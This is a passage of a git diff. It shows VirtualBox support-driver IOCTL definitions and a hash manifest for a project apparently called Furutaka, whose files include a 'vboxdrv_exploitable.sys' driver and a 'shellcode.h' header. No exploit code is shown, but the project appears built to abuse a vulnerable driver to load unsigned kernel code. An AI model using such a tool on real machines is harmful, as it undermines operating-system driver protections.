sizeof(SUPSETVMFORFAST) +#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT sizeof(SUPREQHDR) +#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66) + +#define SUP_IOCTL_LDR_OPEN SUP_CTL_CODE_SIZE(5, SUP_IOCTL_LDR_OPEN_SIZE) +#define SUP_IOCTL_LDR_OPEN_SIZE sizeof(SUPLDROPEN) +#define SUP_IOCTL_LDR_OPEN_SIZE_IN sizeof(SUPLDROPEN) +#define SUP_IOCTL_LDR_OPEN_SIZE_OUT (sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPLDROPEN, u.Out)) + +#define SUP_IOCTL_LDR_LOAD SUP_CTL_CODE_BIG(6) +#define SUP_IOCTL_LDR_LOAD_SIZE(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage]) +#define SUP_IOCTL_LDR_LOAD_SIZE_IN(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage]) +#define SUP_IOCTL_LDR_LOAD_SIZE_OUT sizeof(SUPREQHDR) + + /** @name SUP_IOCTL_LDR_FREE + * Free an image. + * @{ + */ +#define SUP_IOCTL_LDR_FREE SUP_CTL_CODE_SIZE(7, SUP_IOCTL_LDR_FREE_SIZE) +#define SUP_IOCTL_LDR_FREE_SIZE sizeof(SUPLDRFREE) +#define SUP_IOCTL_LDR_FREE_SIZE_IN sizeof(SUPLDRFREE) +#define SUP_IOCTL_LDR_FREE_SIZE_OUT sizeof(SUPREQHDR) + +typedef struct _SUPLDRFREE { + /** The header. */ + SUPREQHDR Hdr; + union + { + struct + { + /** Address. */ + RTR0PTR pvImageBase; + } In; + } u; +} SUPLDRFREE, *PSUPLDRFREE; diff --git a/TDL.sha256 b/TDL.sha256 new file mode 100644 index 0000000..2d5ae90 --- /dev/null +++ b/TDL.sha256 @@ -0,0 +1,47 @@ +c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys +4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys +48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe +01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj +2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters +d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user +da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln +2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj +f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters +d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user +a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c +cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h +10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln +746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c +3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h +cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys +01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln +c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj +b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters +2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user +1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h +c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c +964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h +8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c +893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c +bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h +107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h +b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Furutaka\minirtl\rtltypes.h +e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13 *Source\Furutaka\minirtl\u64tohex.c +4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5 *Source\Furutaka\minirtl\u64tostr.c +f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107 *Source\Furutaka\minirtl\ultohex.c +9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Furutaka\minirtl\ultostr.c +83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52 *Source\Furutaka\minirtl\_strcat.c +ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutaka\minirtl\_strcmpi.c +969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8 *Source\Furutaka\minirtl\_strcpy.c +27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c +60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c +87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c +8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h +fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h +8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc +a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h +2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c +d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h +12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h